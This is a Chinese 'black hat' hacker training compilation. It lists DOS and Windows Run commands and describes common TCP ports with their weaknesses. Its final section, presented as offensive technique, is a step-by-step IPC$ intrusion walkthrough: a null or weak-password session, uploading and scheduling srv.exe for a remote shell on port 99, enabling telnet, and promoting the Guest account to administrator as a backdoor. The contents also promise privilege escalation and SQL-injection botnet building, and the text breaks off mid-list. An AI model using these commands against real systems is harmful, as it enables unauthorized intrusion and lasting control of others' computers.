黑帽

建议收藏，华盟内部培训整理的相关命令，都需要一个一个培训，带着练习的。今天发给大家。 第一部分：DOS命令大全 第二部分：TCP端口:作用,漏洞,操作详析 第三部分：开始→运行→命令 集锦 第四部分：IPC$空连接的入侵和防御详解  第五部分：GOOGLE搜索秘籍 第六部分：：21种RING的提权方法  第七部分：：菜鸟＋Sa＋注入工具组合＝肉鸡成群 第入部分：精悉DOS入侵 -------------------------------------------------------------------------------- DOS 常用命令： dir 列文件名       deltree 删除目录树        cls 清屏           cd 改变当前目录 copy 拷贝文件      diskcopy 复制磁盘         del 删除文件       format 格式化磁盘 edit 文本编辑      mem 查看内存状况          md 建立子目录      move 移动文件、改目录名 more 分屏显示      type 显示文件内容         rd 删除目录        sys 制作DOS系统盘 ren 改变文件名     xcopy 拷贝目录与文件      chkdsk 检查磁盘    attrib 设置文件属性 fdisk 硬盘分区     date 显示及修改日期       label 设置卷标号   defrag 磁盘碎片整理 msd 系统检测       path 设置搜寻目录         share 文件共享     memmaker内存优化管理 help 帮助          restore 恢复备份文件      set 设置环境变量   time 显示及修改时间 tree 列目录树      debug 随机调试程序        doskey 重新调用DOS命令                                                                                                                                            prempt 设置提示符  undelete恢复被删的文件    scandisk检测、修理磁盘               不常用DOS命令 diskcomp磁盘比较　             append 设置非执行文件路径 expand 还原DOS文件             fasthelp快速显示帮助信息   fc 文件比较                    interink启动服务器  setver 设置版本                intersvr启动客户机   subst 路径替换                 qbasic Basic集成环境 vsafe 防病毒                   unformat恢复已格式化的磁盘   ver 显示DOS版本号              smartdrv设置磁盘加速器 vol 显示磁盘卷标号             lh 将程序装入高端内存      ctty 改变控制设备              emm386 扩展内存管理   常用命令具体介绍:     一、Dir  显示目录文件和子目录列表，呵呵，这个当然是人人要知道的。  可以使用通配符（? 和 *），？表通配一个字符，*表通配任意字符  *.后缀  指定要查看后缀的文件。 上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe  /p  每次显示一个列表屏幕。要查看下一屏，请按键盘上的任意键。  /w  以宽格式显示列表，在每一行上最多显示 5 个文件名或目录名。  /s  列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了  dir *.* -> a.txt 把当前目录文件列表写入a.txt  dir *.* /s -> a.txt 把当前目录文件列表写入a.txt，包括子目录下文件。  二、Attrib  显示、设置或删除指派给文件或目录的只读、存档、系统以及隐藏属性。如果在不含参数的情况下使用，则 attrib 会显示当前目录中所有文件的属性。  r  设置只读属性。  -r  清除只读属性。  a  设置存档文件属性。  -a  清除存档文件属性。  s  设置系统属性。  -s  清除系统属性。  h  设置隐藏属性。  -h  清除隐藏属性。  三、Cls  清除显示在命令提示符窗口中的所有信息，并返回空窗口，即“清屏”  四、Exit  退出当前命令解释程序并返回到系统。  五、format  格式化  /q  执行快速格式化。删除以前已格式化卷的文件表和根目录，但不在扇区之间扫描损坏区域。使用 /q 命令行选项应该仅格式化以前已格式化的完好的卷。  六、Ipconfig  显示所有当前的 TCP/IP 网络配置值、刷新动态主机配置协议 (DHCP) 和域名系统 (DNS) 设置。使用不带参数的 ipconfig 可以显示所有适配器的 IP 地址、子网掩码、默认网关。  /all  显示所有适配器的完整 TCP/IP 配置信息。  ipconfig 等价于 winipcfg，后者在ME、98 和 95 上可用。尽管 Windows XP 没有提供象 winipcfg 命令一样的图形化界面，但可以使用“网络连接”查看和更新 IP 地址。要做到这一点，请打开 网络连接，右键单击某一网络连接，单击“状态”，然后单击“支持”选项卡。  该命令最适用于配置为自动获取 IP 地址的计算机。它使用户可以确定哪些 TCP/IP 配置值是由 DHCP、自动专用 IP 地址 (APIPA) 和其他配置配置的。  七、md  创建目录或子目录  八、Move  将一个或多个文件从一个目录移动到指定的目录。  九、Nbtstat  显示本地计算机和远程计算机的基于 TCP/IP (NetBT) 协议的 NetBIOS 统计资料、NetBIOS 名称表和 NetBIOS 名称缓存。Nbtstat 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 nbtstat 显示帮助。Nbtstat 命令行参数区分大小写。  -a remotename  显示远程计算机的 NetBIOS 名称表，其中，RemoteName 是远程计算机的 NetBIOS 计算机名称。  -A IPAddress  显示远程计算机的 NetBIOS 名称表，其名称由远程计算机的 IP 地址指定（以小数点分隔）。  十、Netstat  显示活动的 TCP 连接、计算机侦听的端口、以太网统计信息、IP 路由表、IPv4 统计信息（对于 IP、ICMP、TCP 和 UDP 协议）以及 IPv6 统计信息（对于 IPv6、ICMPv6、通过 IPv6 的 TCP 以及通过 IPv6 的 UDP 协议）。使用时如果不带参数，netstat 显示活动的 TCP 连接。  -a  显示所有活动的 TCP 连接以及计算机侦听的 TCP 和 UDP 端口。  十一、Ping  通过发送“网际消息控制协议 (ICMP)”回响请求消息来验证与另一台 TCP/IP 计算机的 IP 级连接。回响应答消息的接收情况将和往返过程的次数一起显示出来。Ping 是用于检测网络连接性、可到达性和名称解析的疑难问题的主要 TCP/IP 命令。如果不带参数，ping 将显示帮助。名称和Ip地址解析是它的最简单应用也是用的最多的。  -t  指定在中断前 ping 可以持续发送回响请求信息到目的地。要中断并显示统计信息，请按 CTRL-BREAK。要中断并退出 ping，请按 CTRL-C。  -lSize  指定发送的回响请求消息中“数据”字段的长度（以字节表示）。默认值为 32。size 的最大值是 65,527。  十二、Rename (Ren)  更改文件的名称。  例如 ren *.abc *.cba  十三、Set  显示、设置或删除环境变量。如果没有任何参数，set 命令将显示当前环境设置。  十四、Shutdown  允许您关闭或重新启动本地或远程计算机。如果没有使用参数，shutdown 将注销当前用户。  -m ComputerName  指定要关闭的计算机。  -t xx  将用于系统关闭的定时器设置为 xx 秒。默认值是 20 秒。  -l  注销当前用户，这是默认设置。-m ComputerName 优先。  -s  关闭本地计算机。  -r  关闭之后重新启动。  -a  中止关闭。除了 -l 和 ComputerName 外，系统将忽略其它参数。在超时期间，您只可以使用 -a。  十五、System File Checker (sfc)  win下才有，在重新启动计算机后扫描和验证所有受保护的系统文件。  /scannow  立即扫描所有受保护的系统文件。  /scanonce  一次扫描所有受保护的系统文件。  /purgecache  立即清除“Windows 文件保护”文件高速缓存，并扫描所有受保护的系统文件。  /cachesize=x  设置“Windows 文件保护”文件高速缓存的大小，以 MB 为单位。  十六、type  显示文本文件的内容。使用 type 命令查看文本文件或者是bat文件而不修改文件  十七、Tree  图像化显示路径或驱动器中磁盘的目录结构。  十八、Xcopy  复制文件和目录，包括子目录。  /s  复制非空的目录和子目录。如果省略 /s，xcopy 将在一个目录中工作。  /e  复制所有子目录，包括空目录。  十九、copy  将一个或多个文件从一个位置复制到其他位置  二十、del  删除指定文件。  ftp和bat批命令和net和telnet由于子命令太多，这里不说了，不过这几个都是常用到的。 Re:[攻册]黑客高手必懂基础内容 TCP端口:作用,漏洞,操作详析 在上网的时候，我们经常会看到“端口”这个词，也会经常用到端口号，比如在FTP地址后面增加的“?21”，21就表示端口号。那么端口到底是什么意思呢？怎样查看端口号呢？一个端口是否成为网络恶意攻击的大门呢？，我们应该如何面对形形色色的端口呢？下面就将介绍这方面的内容,以供大家参考。?  　　21端口：21端口主要用于FTP（File Transfer Protocol，文件传输协议）服务。  　　端口说明：21端口主要用于FTP（File Transfer Protocol，文件传输协议）服务，FTP服务主要是为了在两台计算机之间实现文件的上传与下载，一台计算机作为FTP客户端，另一台计算机作为FTP服务器，可以采用匿名（anonymous）登录和授权用户名与密码登录两种方式登录FTP服务器。目前，通过FTP服务来实现文件的传输是互联网上上传、下载文件最主要的方法。另外，还有一个20端口是用于FTP数据传输的默认端口号。  　　在Windows中可以通过Internet信息服务（IIS）来提供FTP连接和管理，也可以单独安装FTP服务器软件来实现FTP功能，比如常见的FTP Serv-U。  　　操作建议：因为有的FTP服务器可以通过匿名登录，所以常常会被黑客利用。另外，21端口还会被一些木马利用，比如Blade Runner、FTP Trojan、Doly Trojan、WebEx等等。如果不架设FTP服务器，建议关闭21端口。 23端口：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。  　　端口说明：23端口主要用于Telnet（远程登录）服务，是Internet上普遍采用的登录和仿真程序。同样需要设置客户端和服务器端，开启Telnet服务的客户端就可以登录远程Telnet服务器，采用授权用户名和密码登录。登录之后，允许用户使用命令提示符窗口进行相应的操作。在Windows中可以在命令提示符窗口中，键入“Telnet”命令来使用Telnet远程登录。  　　操作建议：利用Telnet服务，黑客可以搜索远程登录Unix的服务，扫描操作系统的类型。而且在Windows 2000中Telnet服务存在多个严重的漏洞，比如提升权限、拒绝服务等，可以让远程服务器崩溃。Telnet服务的23端口也是TTS（Tiny Telnet Server）木马的缺省端口。所以，建议关闭23端口。  　　25端口：25端口为SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）服务器所开放，主要用于发送邮件，如今绝大多数邮件服务器都使用该协议。  　　端口说明：25端口为SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）服务器所开放，主要用于发送邮件，如今绝大多数邮件服务器都使用该协议。比如我们在使用电子邮件客户端程序的时候，在创建账户时会要求输入SMTP服务器地址，该服务器地址默认情况下使用的就是25端口。  　　端口漏洞：  　　1. 利用25端口，黑客可以寻找SMTP服务器，用来转发垃圾邮件。  　　2. 25端口被很多木马程序所开放，比如Ajan、Antigen、Email Password Sender、ProMail、trojan、Tapiras、Terminator、WinPC、WinSpy等等。拿WinSpy来说，通过开放25端口，可以监视计算机正在运行的所有窗口和模块。  　　操作建议：如果不是要架设SMTP邮件服务器，可以将该端口关闭。  53端口：53端口为DNS（Domain Name Server，域名服务器）服务器所开放，主要用于域名解析，DNS服务在NT系统中使用的最为广泛。  　　端口说明：53端口为DNS（Domain Name Server，域名服务器）服务器所开放，主要用于域名解析，DNS服务在NT系统中使用的最为广泛。通过DNS服务器可以实现域名与IP地址之间的转换，只要记住域名就可以快速访问网站。  　　端口漏洞：如果开放DNS服务，黑客可以通过分析DNS服务器而直接获取Web服务器等主机的IP地址，再利用53端口突破某些不稳定的防火墙，从而实施攻击。近日，美国一家公司也公布了10个最易遭黑客攻击的漏洞，其中第一位的就是DNS服务器的BIND漏洞。  　　操作建议：如果当前的计算机不是用于提供域名解析服务，建议关闭该端口。  　　67、68端口：67、68端口分别是为Bootp服务的Bootstrap Protocol Server（引导程序协议服务端）和Bootstrap Protocol Client（引导程序协议客户端）开放的端口。  　　端口说明：67、68端口分别是为Bootp服务的Bootstrap Protocol Server（引导程序协议服务端）和Bootstrap Protocol Client（引导程序协议客户端）开放的端口。Bootp服务是一种产生于早期Unix的远程启动协议，我们现在经常用到的DHCP服务就是从Bootp服务扩展而来的。通过Bootp服务可以为局域网中的计算机动态分配IP地址，而不需要每个用户去设置静态IP地址。  　　端口漏洞：如果开放Bootp服务，常常会被黑客利用分配的一个IP地址作为局部路由器通过“中间人”（man-in-middle）方式进行攻击。  　　操作建议：建议关闭该端口。 　　69端口：TFTP是Cisco公司开发的一个简单文件传输协议，类似于FTP。  　　端口说明：69端口是为TFTP（Trival File Tranfer Protocol，次要文件传输协议）服务开放的，TFTP是Cisco公司开发的一个简单文件传输协议，类似于FTP。不过与FTP相比，TFTP不具有复杂的交互存取接口和认证控制，该服务适用于不需要复杂交换环境的客户端和服务器之间进行数据传输。  　　端口漏洞：很多服务器和Bootp服务一起提供TFTP服务，主要用于从系统下载启动代码。可是，因为TFTP服务可以在系统中写入文件，而且黑客还可以利用TFTP的错误配置来从系统获取任何文件。  　　操作建议：建议关闭该端口。  　　79端口：79端口是为Finger服务开放的，主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。  　　端口说明：79端口是为Finger服务开放的，主要用于查询远程主机在线用户、操作系统类型以及是否缓冲区溢出等用户的详细信息。比如要显示远程计算机 www.abc.com上的user01用户的信息，可以在命令行中键入“finger  user01@www.abc.com”即可。  　　端口漏洞：一般黑客要攻击对方的计算机，都是通过相应的端口扫描工具来获得相关信息，比如使用“流光”就可以利用79端口来扫描远程计算机操作系统版本，获得用户信息，还能探测已知的缓冲区溢出错误。这样，就容易遭遇到黑客的攻击。而且，79端口还被Firehotcker木马作为默认的端口。  　　操作建议：建议关闭该端口。  　　80端口：80端口是为HTTP（HyperText Transport Protocol，超文本传输协议）开放的，这是上网冲浪使用最多的协议，主要用于在WWW（World Wide Web，万维网）服务上传输信息的协议。  　　端口说明：80端口是为HTTP（HyperText Transport Protocol，超文本传输协议）开放的，这是上网冲浪使用最多的协议，主要用于在WWW（World Wide Web，万维网）服务上传输信息的协议。我们可以通过HTTP地址加“:80”（即常说的“网址”）来访问网站的，比如 http://www.cce.com.cn:80，因为浏览网页服务默认的端口号是80，所以只要输入网址，不用输入“:80”。  　　端口漏洞：有些木马程序可以利用80端口来攻击计算机的，比如Executor、RingZero等。  　　操作建议：为了能正常上网冲浪，我们必须开启80端口。  99端口：99端口是用于一个名为“Metagram Relay”（亚对策延时）的服务，该服务比较少见，一般是用不到的。  　　端口说明：99端口是用于一个名为“Metagram Relay”（亚对策延时）的服务，该服务比较少见，一般是用不到的。  　　端口漏洞：虽然“Metagram Relay”服务不常用，可是Hidden Port、NCx99等木马程序会利用该端口，比如在Windows 2000中，NCx99可以把cmd．exe程序绑定到99端口，这样用Telnet就可以连接到服务器，随意添加用户、更改权限。  　　操作建议：建议关闭该端口。 　　109、110端口：109端口是为POP2（Post Office Protocol Version 2，邮局协议2）服务开放的，110端口是为POP3（邮件协议3）服务开放的，POP2、POP3都是主要用于接收邮件的。  　　端口说明：109端口是为POP2（Post Office Protocol Version 2，邮局协议2）服务开放的，110端口是为POP3（邮件协议3）服务开放的，POP2、POP3都是主要用于接收邮件的，目前POP3使用的比较多，许多服务器都同时支持POP2和POP3。客户端可以使用POP3协议来访问服务端的邮件服务，如今ISP的绝大多数邮件服务器都是使用该协议。在使用电子邮件客户端程序的时候，会要求输入POP3服务器地址，默认情况下使用的就是110端口。  　　端口漏洞：POP2、POP3在提供邮件接收服务的同时，也出现了不少的漏洞。单单POP3服务在用户名和密码交换缓冲区溢出的漏洞就不少于20个，比如WebEasyMail POP3 Server合法用户名信息泄露漏洞，通过该漏洞远程攻击者可以验证用户账户的存在。另外，110端口也被ProMail trojan等木马程序所利用，通过110端口可以窃取POP账号用户名和密码。  　　操作建议：如果是执行邮件服务器，可以打开该端口。  　　111端口：111端口是SUN公司的RPC（Remote Procedure Call，远程过程调用）服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。  　　端口说明：111端口是SUN公司的RPC（Remote Procedure Call，远程过程调用）服务所开放的端口，主要用于分布式系统中不同计算机的内部进程通信，RPC在多种网络服务中都是很重要的组件。常见的RPC服务有rpc．mountd、NFS、rpc．statd、rpc．csmd、rpc．ttybd、amd等等。在Microsoft的Windows中，同样也有RPC服务。  　　端口漏洞：SUN RPC有一个比较大漏洞，就是在多个RPC服务时xdr＿array函数存在远程缓冲溢出漏洞，通过该漏洞允许攻击者传递超  　　113端口：113端口主要用于Windows的“Authentication Service”（验证服务）。  　　端口说明：113端口主要用于Windows的“Authentication Service”（验证服务），一般与网络连接的计算机都运行该服务，主要用于验证TCP连接的用户，通过该服务可以获得连接计算机的信息。在Windows 2000/2003 Server中，还有专门的IAS组件，通过该组件可以方便远程访问中进行身份验证以及策略管理。  　　端口漏洞：113端口虽然可以方便身份验证，但是也常常被作为FTP、POP、SMTP、IMAP以及IRC等网络服务的记录器，这样会被相应的木马程序所利用，比如基于IRC聊天室控制的木马。另外，113端口还是Invisible Identd Deamon、Kazimas等木马默认开放的端口。 　　操作建议：建议关闭该端口。  　　119端口：119端口是为“Network News Transfer Protocol”（网络新闻组传输协议，简称NNTP）开放的。  　　端口说明：119端口是为“Network News Transfer Protocol”（网络新闻组传输协议，简称NNTP）开放的，主要用于新闻组的传输，当查找USENET服务器的时候会使用该端口。  　　端口漏洞：著名的Happy99蠕虫病毒默认开放的就是119端口，如果中了该病毒会不断发送电子邮件进行传播，并造成网络的堵塞。  　　操作建议：如果是经常使用USENET新闻组，就要注意不定期关闭该端口。 135端口：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务。  　　端口说明：135端口主要用于使用RPC（Remote Procedure Call，远程过程调用）协议并提供DCOM（分布式组件对象模型）服务，通过RPC可以保证在一台计算机上运行的程序可以顺利地执行远程计算机上的代码；使用DCOM可以通过网络直接进行通信，能够跨包括HTTP协议在内的多种网络传输。  　　端口漏洞：相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒，该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞，该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口，该接口侦听的端口就是135。  　　操作建议：为了避免“冲击波”病毒的攻击，建议关闭该端口。  　　137端口：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务）。  　　端口说明：137端口主要用于“NetBIOS Name Service”（NetBIOS名称服务），属于UDP端口，使用者只需要向局域网或互联网上的某台计算机的137端口发送一个请求，就可以获取该计算机的名称、注册用户名，以及是否安装主域控制器、IIS是否正在运行等信息。  　　端口漏洞：因为是UDP端口，对于攻击者来说，通过发送请求很容易就获取目标计算机的相关信息，有些信息是直接可以被利用，并分析漏洞的，比如IIS服务。另外，通过捕获正在利用137端口进行通信的信息包，还可能得到目标计算机的启动和关闭的时间，这样就可以利用专门的工具来攻击。  　　操作建议：建议关闭该端口。 　　139端口：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。  　　端口说明：139端口是为“NetBIOS Session Service”提供的，主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。在Windows中要在局域网中进行文件的共享，必须使用该服务。比如在Windows 98中，可以打开“控制面板”，双击“网络”图标，在“配置”选项卡中单击“文件及打印共享”按钮选中相应的设置就可以安装启用该服务；在Windows 2000/XP中，可以打开“控制面板”，双击“网络连接”图标，打开本地连接属性；接着，在属性窗口的“常规”选项卡中选择“Internet协议（TCP/IP）”，单击“属性”按钮；然后在打开的窗口中，单击“高级”按钮；在“高级TCP/IP设置”窗口中选择“WINS”选项卡，在“NetBIOS设置”区域中启用TCP/IP上的NetBIOS。  　　端口漏洞：开启139端口虽然可以提供共享服务，但是常常被攻击者所利用进行攻击，比如使用流光、SuperScan等端口扫描工具，可以扫描目标计算机的139端口，如果发现有漏洞，可以试图获取用户名和密码，这是非常危险的。  　　操作建议：如果不需要提供文件和打印机共享，建议关闭该端口。  　　143端口：143端口主要是用于“Internet Message Access Protocol”v2（Internet消息访问协议，简称IMAP）。  　　端口说明：143端口主要是用于“Internet Message Access Protocol”v2（Internet消息访问协议，简称IMAP），和POP3一样，是用于电子邮件的接收的协议。通过IMAP协议我们可以在不接收邮件的情况下，知道信件的内容，方便管理服务器中的电子邮件。不过，相对于POP3协议要负责一些。如今，大部分主流的电子邮件客户端软件都支持该协议。  　　端口漏洞：同POP3协议的110端口一样，IMAP使用的143端口也存在缓冲区溢出漏洞，通过该漏洞可以获取用户名和密码。另外，还有一种名为“admv0rm”的Linux蠕虫病毒会利用该端口进行繁殖。  　　操作建议：如果不是使用IMAP服务器操作，应该将该端口关闭。  　　161端口：161端口是用于“Simple Network Management Protocol”（简单网络管理协议，简称SNMP）。  　　端口说明：161端口是用于“Simple Network Management Protocol”（简单网络管理协议，简称SNMP），该协议主要用于管理TCP/IP网络中的网络协议，在Windows中通过SNMP服务可以提供关于TCP/IP网络上主机以及各种网络设备的状态信息。目前，几乎所有的网络设备厂商都实现对SNMP的支持。?  　　在Windows 2000/XP中要安装SNMP服务，我们首先可以打开“Windows组件向导”，在“组件”中选择“管理和监视工具”，单击“详细信息”按钮就可以看到“简单网络管理协议（SNMP）”，选中该组件；然后，单击“下一步”就可以进行安装。  　　端口漏洞：因为通过SNMP可以获得网络中各种设备的状态信息，还能用于对网络设备的控制，所以黑客可以通过SNMP漏洞来完全控制网络。  　　操作建议：建议关闭该端口443端口：443端口即网页浏览端口，主要是用于HTTPS服务，是提供加密和通过安全端口传输的另一种HTTP。  　　端口说明：443端口即网页浏览端口，主要是用于HTTPS服务，是提供加密和通过安全端口传输的另一种HTTP。在一些对安全性要求较高的网站，比如银行、证券、购物等，都采用HTTPS服务，这样在这些网站上的交换信息其他人都无法看到，保证了交易的安全性。网页的地址以https://开始，而不是常见的http://。  　　端口漏洞：HTTPS服务一般是通过SSL（安全套接字层）来保证安全性的，但是SSL漏洞可能会受到黑客的攻击，比如可以黑掉在线银行系统，盗取信用卡账号等。  　　操作建议：建议开启该端口，用于安全性网页的访问。另外，为了防止黑客的攻击，应该及时安装微软针对SSL漏洞发布的最新安全补丁。  　　554端口：554端口默认情况下用于“Real Time Streaming Protocol”（实时流协议，简称RTSP）。  　　端口说明：554端口默认情况下用于“Real Time Streaming Protocol”（实时流协议，简称RTSP），该协议是由RealNetworks和Netscape共同提出的，通过RTSP协议可以借助于Internet将流媒体文件传送到RealPlayer中播放，并能有效地、最大限度地利用有限的网络带宽，传输的流媒体文件一般是Real服务器发布的，包括有.rm、.ram。如今，很多的下载软件都支持RTSP协议，比如FlashGet、影音传送带等等。?  　　端口漏洞：目前，RTSP协议所发现的漏洞主要就是RealNetworks早期发布的Helix Universal Server存在缓冲区溢出漏洞，相对来说，使用的554端口是安全的。  　　操作建议：为了能欣赏并下载到RTSP协议的流媒体文件，建议开启554端口。  　　1024端口：1024端口一般不固定分配给某个服务，在英文中的解释是“Reserved”（保留）。  　　端口说明：1024端口一般不固定分配给某个服务，在英文中的解释是“Reserved”（保留）。之前，我们曾经提到过动态端口的范围是从1024～65535，而1024正是动态端口的开始。该端口一般分配给第一个向系统发出申请的服务，在关闭服务的时候，就会释放1024端口，等待其他服务的调用。  　　端口漏洞：著名的YAI木马病毒默认使用的就是1024端口，通过该木马可以远程控制目标计算机，获取计算机的屏幕图像、记录键盘事件、获取密码等，后果是比较严重的。  　　操作建议：一般的杀毒软件都可以方便地进行YAI病毒的查杀，所以在确认无YAI病毒的情况下建议开启该端口。 Re:[攻册]黑客高手必懂基础内容 开始→运行→命令 集锦 winver---------检查Windows版本  wmimgmt.msc----打开windows管理体系结构(WMI)  wupdmgr--------windows更新程序  w script --------windows脚本宿主设置  write----------写字板  winmsd---------系统信息  wiaacmgr-------扫描仪和照相机向导  winchat--------XP自带局域网聊天  mem.exe--------显示内存使用情况  Msconfig.exe---系统配置实用程序  mplayer2-------简易widnows media player  mspaint--------画图板  mstsc----------远程桌面连接  mplayer2-------媒体播放机  magnify--------放大镜实用程序  mmc------------打开控制台  mobsync--------同步命令  dxdiag---------检查DirectX信息  drwtsn32------ 系统医生  devmgmt.msc--- 设备管理器  dfrg.msc-------磁盘碎片整理程序  diskmgmt.msc---磁盘管理实用程序  dcomcnfg-------打开系统组件服务  ddeshare-------打开DDE共享设置  dvdplay--------DVD播放器  net stop messenger-----停止信使服务  net start messenger----开始信使服务  notepad--------打开记事本  nslookup-------网络管理的工具向导  ntbackup-------系统备份和还原  narrator-------屏幕“讲述人”  ntmsmgr.msc----移动存储管理器  ntmsoprq.msc---移动存储管理员操作请求  netstat -an----(TC)命令检查接口  syncapp--------创建一个公文包  sysedit--------系统配置编辑器  sigverif-------文件签名验证程序  sndrec32-------录音机  shrpubw--------创建共享文件夹  secpol.msc-----本地安全策略  syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码  services.msc---本地服务设置  Sndvol32-------音量控制程序  sfc.exe--------系统文件检查器  sfc /scannow---windows文件保护  tsshutdn-------60秒倒计时关机命令  tourstart------xp简介（安装完成后出现的漫游xp程序）  taskmgr--------任务管理器  eventvwr-------事件查看器  eudcedit-------造字程序  explorer-------打开资源管理器  packager-------对象包装程序  perfmon.msc----计算机性能监测程序  progman--------程序管理器  regedit.exe----注册表  rsop.msc-------组策略结果集  regedt32-------注册表编辑器  rononce -p ----15秒关机  regsvr32 /u *.dll----停止dll文件运行  regsvr32 /u zipfldr.dll------取消ZIP支持  cmd.exe--------CMD命令提示符  chkdsk.exe-----Chkdsk磁盘检查  certmgr.msc----证书管理实用程序  calc-----------启动计算器  charmap--------启动字符映射表  cliconfg-------SQL SERVER 客户端网络实用程序  Clipbrd--------剪贴板查看器  conf-----------启动netmeeting  compmgmt.msc---计算机管理  cleanmgr-------整理  ciadv.msc------索引服务程序  osk------------打开屏幕键盘  odbcad32-------ODBC数据源管理器  oobe/msoobe /a----检查XP是否激活  lusrmgr.msc----本机用户和组  logoff---------注销命令  iexpress-------自带的压缩包的制作软件  IEXPRESS 是 Windows 中自带的 CAB 格式压缩包的制作软件，从 Windows 2000就有了，但是它一直都藏 在 Windows 的系统，在微软的许多产品介绍中似乎也看不见它的踪迹，IEXPRESS 不仅支持 CAB 文件的打包 制作并且支持高级 INF 格式安装 Nslookup-------IP地址侦测器  fsmgmt.msc-----共享文件夹管理器  utilman--------辅助工具管理器  gpedit.msc-----组策略 Re:[攻册]黑客高手必懂基础内容 IPC$空连接的入侵和防御详解  相关命令 　　建立空连接 　　　　net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)  　　建立非空连接 　　　　net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格) 　　映射默认共享 　　　　net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推) 　　如果已经和目标建立了ipc$，则可以直接用IP 盘符 $访问,具体命令 net use z: \\IP\c$ 　　删除一个ipc$连接 　　　　net use \\IP\ipc$ /del  　　删除共享映射 　　　　net use c: /del 删除映射的c盘，其他盘类推  　　　　net use * /del 删除全部,会有提示要求按y确认 经典入侵模式 　　1.C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"  　　这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。  　　2. C:\>copy srv.exe \\127.0.0.1\admin$  　　先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。 　　3.C:\>net time \\127.0.0.1  　　查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。 　　4.C:\>at \\127.0.0.1 11:05 srv.exe  　　用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）  　　5.C:\>net time \\127.0.0.1  　　再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。 　　6.C:\>telnet 127.0.0.1 99  　　这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 　　7.C:\>copy ntlm.exe \\127.0.0.1\admin$  　　用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。 　　8.C:\WINNT\system32>ntlm  　　输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！  　　9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)  　　为了以防万一,我们再把guest激活加到管理组  　　10.C:\>net user guest /active:yes  　　将对方的Guest用户激活 　　11.C:\>net user guest 1234  　　将Guest的密码改为1234,或者你要设定的密码 　　12.C:\>net localgroup administrators guest /add  　　将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机) ipc$与空连接,139,445端口,默认共享的关系 　　以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂) 　　ipc$与空连接 　　不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了. 　　许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟). 　　ipc$与139,445端口 　　ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的. 　　ipc$与默认共享 　　默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享) 　　ipc$连接失败的原因 　　以下5个原因是比较常见的: 　　1)你的系统不是NT或以上操作系统; 　　2)对方没有打开ipc$默认共享 　　3)对方未开启139或445端口(惑被防火墙屏蔽) 　　4)你的命令输入有误(比如缺少了空格等) 　　5)用户名或密码错误(空连接当然无所谓了) 　　另外,你也可以根据返回的错误号分析原因：  　　错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；  　　错误号51，Windows 无法找到网络路径 : 网络有问题；  　　错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；  　　错误号67，找不到网络名 ： 